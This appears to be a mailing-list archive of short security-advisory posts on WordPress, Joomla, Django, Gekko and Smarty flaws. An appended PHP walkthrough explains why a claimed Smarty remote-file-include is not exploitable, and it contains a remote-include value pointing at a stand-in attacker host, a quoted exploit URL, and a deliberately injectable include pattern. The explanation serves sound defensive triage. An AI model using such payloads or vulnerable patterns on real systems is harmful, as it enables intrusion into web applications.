WordPress 2.5 - Salt cracking vulnerability

2008-04-15 Thread J. Carlos Nieto
WORDPRESS 2.5 - SALT CRACKING VULNERABILITY --- http://xiam.menteslibres.org/pages/advisories/wordpress-2-5-salt-cracking-vulnerability By J. Carlos Nieto <[EMAIL PROTECTED]> http://xiam.menteslibres.org Severity Medi

Re: Joomla 1.0.13 CSRF

2008-01-08 Thread J. Carlos Nieto
J. Carlos Nieto wrote: There exists a Cross Site Scripting security hole in Joomla 1.0.13. Sorry, it should be "Cross Site Request Forgery".

Joomla 1.0.13 CSRF

2008-01-08 Thread J. Carlos Nieto
Author: Jose Carlos Nieto. Date: Jan 08, 2008 Severity: Mild There exists a Cross Site Scripting security hole in Joomla 1.0.13. Background == *Joomla!* is a free , open source content ma

Re: Gekko <=0.8.2 (temp directory) Path Disclosure

2007-11-28 Thread J. Carlos Nieto
Hi. You forgot to mention that this happens only when Gekko is not installed under Apache server. The file temp/.htaccess contains the following lines: Order Allow,Deny Deny from all So if you try to get any file under the "temp" directory it will throw you a 403 error. If you are using A

Django 0.96 (stable) Admin Panel CSRF

2007-10-30 Thread J. Carlos Nieto
Author: J. Carlos Nieto. Date: Oct 21, 2007 There exists a security hole in the default Django admin panel. Background == Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that all

Re: Smarty-2.6.1 Remote File Include Vulnerabilities

2006-10-24 Thread J. Carlos Nieto
On Mon, 2006-10-23 at 16:30 +, [EMAIL PROTECTED] > > require_once './config.php'; > require_once SMARTY_DIR . 'Smarty.class.php'; > require_once 'PHPUnit.php'; SMARTY_DIR is a constant, isn't it? > > > http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll? > But
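The reply above hinges on one PHP detail: a name created with define() is a constant, and register_globals (or an explicit extract() of the request) only ever creates variables, so a query parameter named SMARTY_DIR cannot reach `require_once SMARTY_DIR . 'Smarty.class.php'`. The following is an added example, not code from Smarty or from either poster; it simulates register_globals with extract() so it runs on current PHP, and the constant value and request path are hypothetical. It places the pattern that would be a remote file include next to the constant-based pattern the reply refers to.

```php
<?php
// Added example (not Smarty's code): why a GET parameter cannot override a
// define()d constant such as SMARTY_DIR. register_globals is simulated with
// extract(); the paths and the constant value below are hypothetical.

// Constructed request, as the advisory's URL would send it:
$_GET = ['SMARTY_DIR' => 'http://attacker.example/Sh3ll?'];

// --- Pattern that WOULD be a remote file include --------------------------
// A plain variable populated from the request (register_globals, or an
// explicit extract($_GET)) flows straight into the include path.
function includePathFromVariable(array $request): string
{
    $SMARTY_DIR = '/var/www/Smarty-2.6.14/libs/';   // hypothetical default
    extract($request, EXTR_OVERWRITE);               // $SMARTY_DIR now attacker-controlled
    return $SMARTY_DIR . 'Smarty.class.php';         // what require_once would receive
}

// --- Pattern the reply refers to: a constant from config.php --------------
// Constants live in a separate table from variables, so nothing the request
// does to $SMARTY_DIR (or $_GET['SMARTY_DIR']) changes SMARTY_DIR.
define('SMARTY_DIR', '/var/www/Smarty-2.6.14/libs/');   // hypothetical value

function includePathFromConstant(array $request): string
{
    extract($request, EXTR_OVERWRITE);               // creates $SMARTY_DIR, not SMARTY_DIR
    return SMARTY_DIR . 'Smarty.class.php';          // still the config.php value
}

// A second define() of an existing constant fails (returns false, with a
// warning suppressed here), so even a later define(...$_GET...) cannot win.
function redefineAttempt(string $attackerValue): bool
{
    return @define('SMARTY_DIR', $attackerValue);
}

echo "variable-based path : ", includePathFromVariable($_GET), PHP_EOL;
echo "constant-based path : ", includePathFromConstant($_GET), PHP_EOL;
echo "redefine succeeded  : ", var_export(redefineAttempt($_GET['SMARTY_DIR']), true), PHP_EOL;
echo "constant afterwards : ", SMARTY_DIR, PHP_EOL;
```

Running it prints the attacker URL only for the variable-based path; the constant-based path and the constant itself are unchanged, and the redefine attempt returns false. The practical check when triaging a report like this one is therefore to confirm how the name is introduced in the included config file: a define() makes the claimed parameter injection moot, whereas an assignment to a variable that is left unset on some code path, combined with register_globals, would make it real.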